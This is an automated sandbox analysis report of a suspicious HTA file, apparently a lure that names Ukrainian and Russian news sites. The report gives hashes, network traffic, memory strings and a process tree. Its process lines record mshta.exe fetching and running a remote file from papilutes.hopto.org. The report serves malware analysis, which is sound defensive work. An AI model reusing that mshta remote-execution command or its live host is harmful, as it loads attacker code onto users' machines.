Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
2-12749-25_21.04.2025.HTA.hta

Overview

General Information

Sample name:2-12749-25_21.04.2025.HTA.hta
Analysis ID:1671026
MD5:d8eb78d2145229db1a588a24cf632985
SHA1:17c5a033e6d0f99218b0d0bb6a18b6aed3e0a9c3
SHA256:341435e34c6d146cbb28f4e7de6d2e0e2b7ec2be3625f14a56041124f4af34cd
Tags:193-124-22-113htapapilutesplease-clinton-missed-inguser-JAMESWT_WT
Infos:

Detection

Score:2
Range:0 - 100
Confidence:60%

Signatures

Creates a process in suspended mode (likely to inject code)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • mshta.exe (PID: 7220 cmdline: mshta.exe "C:\Users\user\Desktop\2-12749-25_21.04.2025.HTA.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • mshta.exe (PID: 2004 cmdline: "C:\Windows\system32\mshta.exe" http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptx MD5: 06B02D5C097C7DB1F109749C45F3F505)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

  • Networking
  • System Summary
  • Hooking and other Techniques for Hiding and Protection
  • Malware Analysis System Evasion
  • HIPS / PFW / Operating System Protection Evasion

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: global trafficHTTP traffic detected: GET /Gurukr/cableW2l/comparableKrE.pptx HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: papilutes.hopto.orgConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /Gurukr/cableW2l/comparableKrE.pptx HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: papilutes.hopto.orgConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: papilutes.hopto.org
Source: mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, 2-12749-25_21.04.2025.HTA.htaString found in binary or memory: http://papilutes.hopto.org
Source: mshta.exe, 00000000.00000003.1290228062.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1294739881.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://papilutes.hopto.org/Gurukr/cableW2l
Source: mshta.exe, 00000001.00000002.2522777705.0000000003194000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptx
Source: mshta.exe, 00000001.00000002.2522777705.0000000003170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptx=
Source: mshta.exe, 00000001.00000002.2522777705.0000000003170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptx?
Source: mshta.exe, 00000000.00000002.1294457111.0000000000575000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.2522741582.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.2522777705.0000000003110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxC:
Source: mshta.exe, 00000001.00000002.2522777705.000000000312E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxN
Source: mshta.exe, 00000001.00000002.2522588226.0000000000AA9000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxd
Source: mshta.exe, 00000001.00000002.2522777705.000000000312E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxl
Source: mshta.exe, 00000001.00000002.2522777705.000000000312E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxm
Source: mshta.exe, 00000001.00000002.2522777705.0000000003170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxy.IE5R;
Source: mshta.exe, 00000000.00000003.1291320484.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290228062.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290442821.000000000076D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1294642550.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, 2-12749-25_21.04.2025.HTA.htaString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript
Source: mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScriptX
Source: mshta.exe, 00000000.00000003.1290228062.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290442821.000000000076D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, 2-12749-25_21.04.2025.HTA.htaString found in binary or memory: https://meta.ua/news/all/?gclid=EAIaIQobChMImYXApMKt-QIVsRJ7Ch26PwmoEAAYAiAAEgKMyPD_BwE
Source: mshta.exe, 00000000.00000003.1290228062.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://meta.ua/news/all/?gclid=EAIaIQobChMImYXApMKt-QIVsRJ7Ch26PwmoEAAYAiAAEgKMyPD_BwE3PM41zeMBWfPn
Source: mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://meta.ua/news/all/?gclid=EAIaIQobChMImYXApMKt-QIVsRJ7Ch26PwmoEAAYAiAAEgKMyPD_BwEB
Source: mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292771587.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1291320484.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 2-12749-25_21.04.2025.HTA.htaString found in binary or memory: https://passport.i.ua/login/?
Source: mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1294642550.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1291320484.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 2-12749-25_21.04.2025.HTA.htaString found in binary or memory: https://regnum.ru/foreign/eastern-europe/ukraine.html
Source: mshta.exe, 00000000.00000003.1288694322.0000000000780000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1291320484.0000000000780000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.0000000000780000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1294642550.0000000000780000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://regnum.ru/foreign/eastern-europe/ukraine.htmlHTA.hta#
Source: mshta.exe, 00000000.00000003.1291320484.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290228062.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290442821.0000000000751000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290442821.000000000076D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1294642550.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, 2-12749-25_21.04.2025.HTA.htaString found in binary or memory: https://t.me/
Source: mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/G
Source: mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292771587.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1291320484.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 2-12749-25_21.04.2025.HTA.htaString found in binary or memory: https://www.bbc.com/
Source: mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292771587.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1291320484.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 2-12749-25_21.04.2025.HTA.htaString found in binary or memory: https://www.crimea.kp.ru/daily/euromaidan/
Source: mshta.exe, 00000000.00000003.1288694322.0000000000780000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1291320484.0000000000780000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.0000000000780000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1294642550.0000000000780000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.crimea.kp.ru/daily/euromaidan/x
Source: mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, 2-12749-25_21.04.2025.HTA.htaString found in binary or memory: https://www.rbc.ru/tags/?tag=
Source: mshta.exe, 00000000.00000003.1291320484.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290228062.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290442821.000000000076D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1294642550.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, 2-12749-25_21.04.2025.HTA.htaString found in binary or memory: https://www.ukr.net/
Source: mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ukr.net/o
Source: mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1294722604.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BC8000.00000004.00000020.00020000.00000000.sdmp, 2-12749-25_21.04.2025.HTA.htaString found in binary or memory: https://www.unian.net/
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: clean2.winHTA@3/0@1/1
Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\comparableKrE[1].psJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\2-12749-25_21.04.2025.HTA.hta"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\system32\mshta.exe" http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptx
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\system32\mshta.exe" http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
